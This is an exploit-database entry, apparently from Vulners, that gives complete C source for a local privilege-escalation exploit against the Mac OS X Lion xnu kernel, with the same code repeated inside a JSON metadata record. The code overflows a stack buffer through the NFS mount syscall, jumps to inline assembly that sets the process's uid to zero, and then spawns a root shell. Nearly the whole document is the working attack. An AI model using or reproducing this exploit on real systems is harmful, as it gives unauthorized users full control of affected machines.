Search...

Apple Mac OSX (Lion) Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Local Privilege Escalation

2014-04-11T00:00:00

ID EXPLOITPACK:2D161680B42AB336AE66659A44DE7CA0
Type exploitpack
Reporter Kenzley Alphonse
Modified 2014-04-11T00:00:00

Description

Apple Mac OSX (Lion) Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Local Privilege Escalation

                                        
                                            /*
 * Apple Mac OS X Lion Kernel &lt;=  xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit
 * CVE None
 * by Kenzley Alphonse &lt;kenzley [dot] alphonse [at] gmail [dot] com&gt;
 *
 *
 * Notes:
 *	This exploit leverage a stack overflow vulnerability to escalate privileges.
 *	The vulnerable function nfs_convert_old_nfs_args does not verify the size 
 *	of a user-provided argument before copying it to the stack. As a result by
 *	passing a large size, a local user can overwrite the stack with arbitrary 
 *	content.
 *
 * Tested on Max OS X Lion xnu-1699.22.73 (x86_64)
 * Tested on Max OS X Lion xnu-1699.32.7  (x86_64)
 *
 *   Greets to taviso, spender, joberheide
 */
 
#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;strings.h&gt;
#include &lt;errno.h&gt;
#include &lt;sys/mman.h&gt;
#include &lt;sys/mount.h&gt;
#include &lt;sys/param.h&gt;
#include &lt;sys/stat.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;unistd.h&gt;
 
/** change these to fit your environment if needed **/
#define SSIZE		(536)
 
/** struct user_nfs_args was copied directly from "/bsd/nfs/nfs.h" of the xnu kernel **/
struct user_nfs_args {
	int		version;	/* args structure version number */
	char*	addr __attribute__((aligned(8)));		/* file server address */
	int		addrlen;	/* length of address */
	int		sotype;		/* Socket type */
	int		proto;		/* and Protocol */
	char *	fh __attribute__((aligned(8)));		/* File handle to be mounted */
	int		fhsize;		/* Size, in bytes, of fh */
	int		flags;		/* flags */
	int		wsize;		/* write size in bytes */
	int		rsize;		/* read size in bytes */
	int		readdirsize;	/* readdir size in bytes */
	int		timeo;		/* initial timeout in .1 secs */
	int		retrans;	/* times to retry send */
	int		maxgrouplist;	/* Max. size of group list */
	int		readahead;	/* # of blocks to readahead */
	int		leaseterm;	/* obsolete: Term (sec) of lease */
	int		deadthresh;	/* obsolete: Retrans threshold */
	char*	hostname __attribute__((aligned(8)));	/* server's name */
	/* NFS_ARGSVERSION 3 ends here */
	int		acregmin;	/* reg file min attr cache timeout */
	int		acregmax;	/* reg file max attr cache timeout */
	int		acdirmin;	/* dir min attr cache timeout */
	int		acdirmax;	/* dir max attr cache timeout */
	/* NFS_ARGSVERSION 4 ends here */
	uint	auth;		/* security mechanism flavor */
	/* NFS_ARGSVERSION 5 ends here */
	uint	deadtimeout;	/* secs until unresponsive mount considered dead */
};
 
/** sets the uid for the current process  and safely exits from the kernel**/
static void r00t_me() {
	asm(
		// padding
		"nop; nop; nop; nop;"
 
		// task_t %rax = current_task()
		"movq	%%gs:0x00000008, %%rax;"
		"movq	0x00000348(%%rax), %%rax;"
		
		// proc %rax = get_bsdtask_info()
		"movq	0x000002d8(%%rax),%%rax;"
		
		// ucred location at proc
		"movq	0x000000d0(%%rax),%%rax;"
		
		// uid = 0
		"xorl	%%edi, %%edi;"		
		"movl	%%edi, 0x0000001c(%%rax);"
		"movl	%%edi, 0x00000020(%%rax);"
		
		// fix the stack pointer and return (EACCES)
		"movq	$13, %%rax;"
		"addq	$0x00000308,%%rsp;"
		"popq	%%rbx;"
		"popq	%%r12;"
		"popq	%%r13;"
		"popq	%%r14;"
		"popq	%%r15;"
		"popq	%%rbp;"
		"ret;"
		:::"%rax"
	);
}
 
int main(int argc, char ** argv) {
	struct user_nfs_args xdrbuf;
	char * path;
	char obuf[SSIZE];
 
 
	/** clear the arguments **/
	memset(&xdrbuf, 0x00, sizeof(struct user_nfs_args));
	memset(obuf, 0x00, SSIZE);
 
	/** set up variable to get path to vulnerable code **/
	xdrbuf.version = 3;
	xdrbuf.hostname = "localhost";
	xdrbuf.addrlen = SSIZE;
	xdrbuf.addr = obuf;
	
	/** set ret address **/
	*(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5);
	printf("[*] set ret = 0x%.16lx\n", *(unsigned long *)&obuf[528]);
		
	/** create a unique tmp name **/
	if ((path = tmpnam(NULL)) == NULL) {
		// path can be any directory which we have read/write/exec access
		// but I'd much rather create one instead of searching for one
		perror("[-] tmpnam");
		exit(EXIT_FAILURE);
	}
	
	/** make the path in tmp so that we can use it **/
	if (mkdir(path, 0660) &lt; 0) {
		perror("[-] mkdir");
		exit(EXIT_FAILURE);
	}
	
	/** inform the user that the path was created **/
	printf("[*] created sploit path%s\n", path);
	
	/** call the vulnerable function **/
	if (mount("nfs", path, 0, &xdrbuf) &lt; 0) {
		if (errno == EACCES) {
			puts("[+] escalating privileges...");
		} else {
			perror("[-] mount");
		}
		
	}
	
	/** clean up tmp dir **/
	if (rmdir(path) &lt; 0) {
		perror("[-] rmdir");
	}
	
	/** check if privs are equal to root **/
	if (getuid() != 0) {
		puts("[-] priviledge escalation failed");
		exit(EXIT_FAILURE);
	}
	
	/** get root shell **/
	printf("[+] We are now uid=%i ... your welcome!\n", getuid());
	printf("[+] Dropping a shell.\n");
	execl("/bin/sh", "/bin/sh", NULL);
	return 0;
}

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:03", "references": [], "description": "\nApple Mac OSX (Lion) Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Local Privilege Escalation", "edition": 1, "reporter": "Kenzley Alphonse", "exploitpack": {"type": "local", "platform": "osx"}, "published": "2014-04-11T00:00:00", "title": "Apple Mac OSX (Lion) Kernel xnu-1699.32.7 except xnu-1699.24.8 NFS Mount - Local Privilege Escalation", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2014-04-11T00:00:00", "id": "EXPLOITPACK:2D161680B42AB336AE66659A44DE7CA0", "href": "", "viewCount": 7, "sourceData": "/*\n * Apple Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 NFS Mount Privilege Escalation Exploit\n * CVE None\n * by Kenzley Alphonse <kenzley [dot] alphonse [at] gmail [dot] com>\n *\n *\n * Notes:\n *\tThis exploit leverage a stack overflow vulnerability to escalate privileges.\n *\tThe vulnerable function nfs_convert_old_nfs_args does not verify the size \n *\tof a user-provided argument before copying it to the stack. As a result by\n *\tpassing a large size, a local user can overwrite the stack with arbitrary \n *\tcontent.\n *\n * Tested on Max OS X Lion xnu-1699.22.73 (x86_64)\n * Tested on Max OS X Lion xnu-1699.32.7 (x86_64)\n *\n * Greets to taviso, spender, joberheide\n */\n \n#include <stdio.h>\n#include <stdlib.h>\n#include <strings.h>\n#include <errno.h>\n#include <sys/mman.h>\n#include <sys/mount.h>\n#include <sys/param.h>\n#include <sys/stat.h>\n#include <sys/types.h>\n#include <unistd.h>\n \n/** change these to fit your environment if needed **/\n#define SSIZE\t\t(536)\n \n/** struct user_nfs_args was copied directly from \"/bsd/nfs/nfs.h\" of the xnu kernel **/\nstruct user_nfs_args {\n\tint\t\tversion;\t/* args structure version number */\n\tchar*\taddr __attribute__((aligned(8)));\t\t/* file server address */\n\tint\t\taddrlen;\t/* length of address */\n\tint\t\tsotype;\t\t/* Socket type */\n\tint\t\tproto;\t\t/* and Protocol */\n\tchar *\tfh __attribute__((aligned(8)));\t\t/* File handle to be mounted */\n\tint\t\tfhsize;\t\t/* Size, in bytes, of fh */\n\tint\t\tflags;\t\t/* flags */\n\tint\t\twsize;\t\t/* write size in bytes */\n\tint\t\trsize;\t\t/* read size in bytes */\n\tint\t\treaddirsize;\t/* readdir size in bytes */\n\tint\t\ttimeo;\t\t/* initial timeout in .1 secs */\n\tint\t\tretrans;\t/* times to retry send */\n\tint\t\tmaxgrouplist;\t/* Max. size of group list */\n\tint\t\treadahead;\t/* # of blocks to readahead */\n\tint\t\tleaseterm;\t/* obsolete: Term (sec) of lease */\n\tint\t\tdeadthresh;\t/* obsolete: Retrans threshold */\n\tchar*\thostname __attribute__((aligned(8)));\t/* server's name */\n\t/* NFS_ARGSVERSION 3 ends here */\n\tint\t\tacregmin;\t/* reg file min attr cache timeout */\n\tint\t\tacregmax;\t/* reg file max attr cache timeout */\n\tint\t\tacdirmin;\t/* dir min attr cache timeout */\n\tint\t\tacdirmax;\t/* dir max attr cache timeout */\n\t/* NFS_ARGSVERSION 4 ends here */\n\tuint\tauth;\t\t/* security mechanism flavor */\n\t/* NFS_ARGSVERSION 5 ends here */\n\tuint\tdeadtimeout;\t/* secs until unresponsive mount considered dead */\n};\n \n/** sets the uid for the current process and safely exits from the kernel**/\nstatic void r00t_me() {\n\tasm(\n\t\t// padding\n\t\t\"nop; nop; nop; nop;\"\n \n\t\t// task_t %rax = current_task()\n\t\t\"movq\t%%gs:0x00000008, %%rax;\"\n\t\t\"movq\t0x00000348(%%rax), %%rax;\"\n\t\t\n\t\t// proc %rax = get_bsdtask_info()\n\t\t\"movq\t0x000002d8(%%rax),%%rax;\"\n\t\t\n\t\t// ucred location at proc\n\t\t\"movq\t0x000000d0(%%rax),%%rax;\"\n\t\t\n\t\t// uid = 0\n\t\t\"xorl\t%%edi, %%edi;\"\t\t\n\t\t\"movl\t%%edi, 0x0000001c(%%rax);\"\n\t\t\"movl\t%%edi, 0x00000020(%%rax);\"\n\t\t\n\t\t// fix the stack pointer and return (EACCES)\n\t\t\"movq\t$13, %%rax;\"\n\t\t\"addq\t$0x00000308,%%rsp;\"\n\t\t\"popq\t%%rbx;\"\n\t\t\"popq\t%%r12;\"\n\t\t\"popq\t%%r13;\"\n\t\t\"popq\t%%r14;\"\n\t\t\"popq\t%%r15;\"\n\t\t\"popq\t%%rbp;\"\n\t\t\"ret;\"\n\t\t:::\"%rax\"\n\t);\n}\n \nint main(int argc, char ** argv) {\n\tstruct user_nfs_args xdrbuf;\n\tchar * path;\n\tchar obuf[SSIZE];\n \n \n\t/** clear the arguments **/\n\tmemset(&xdrbuf, 0x00, sizeof(struct user_nfs_args));\n\tmemset(obuf, 0x00, SSIZE);\n \n\t/** set up variable to get path to vulnerable code **/\n\txdrbuf.version = 3;\n\txdrbuf.hostname = \"localhost\";\n\txdrbuf.addrlen = SSIZE;\n\txdrbuf.addr = obuf;\n\t\n\t/** set ret address **/\n\t*(unsigned long *)&obuf[528] = (unsigned long) (&r00t_me + 5);\n\tprintf(\"[*] set ret = 0x%.16lx\\n\", *(unsigned long *)&obuf[528]);\n\t\t\n\t/** create a unique tmp name **/\n\tif ((path = tmpnam(NULL)) == NULL) {\n\t\t// path can be any directory which we have read/write/exec access\n\t\t// but I'd much rather create one instead of searching for one\n\t\tperror(\"[-] tmpnam\");\n\t\texit(EXIT_FAILURE);\n\t}\n\t\n\t/** make the path in tmp so that we can use it **/\n\tif (mkdir(path, 0660) < 0) {\n\t\tperror(\"[-] mkdir\");\n\t\texit(EXIT_FAILURE);\n\t}\n\t\n\t/** inform the user that the path was created **/\n\tprintf(\"[*] created sploit path%s\\n\", path);\n\t\n\t/** call the vulnerable function **/\n\tif (mount(\"nfs\", path, 0, &xdrbuf) < 0) {\n\t\tif (errno == EACCES) {\n\t\t\tputs(\"[+] escalating privileges...\");\n\t\t} else {\n\t\t\tperror(\"[-] mount\");\n\t\t}\n\t\t\n\t}\n\t\n\t/** clean up tmp dir **/\n\tif (rmdir(path) < 0) {\n\t\tperror(\"[-] rmdir\");\n\t}\n\t\n\t/** check if privs are equal to root **/\n\tif (getuid() != 0) {\n\t\tputs(\"[-] priviledge escalation failed\");\n\t\texit(EXIT_FAILURE);\n\t}\n\t\n\t/** get root shell **/\n\tprintf(\"[+] We are now uid=%i ... your welcome!\\n\", getuid());\n\tprintf(\"[+] Dropping a shell.\\n\");\n\texecl(\"/bin/sh\", \"/bin/sh\", NULL);\n\treturn 0;\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645501523}}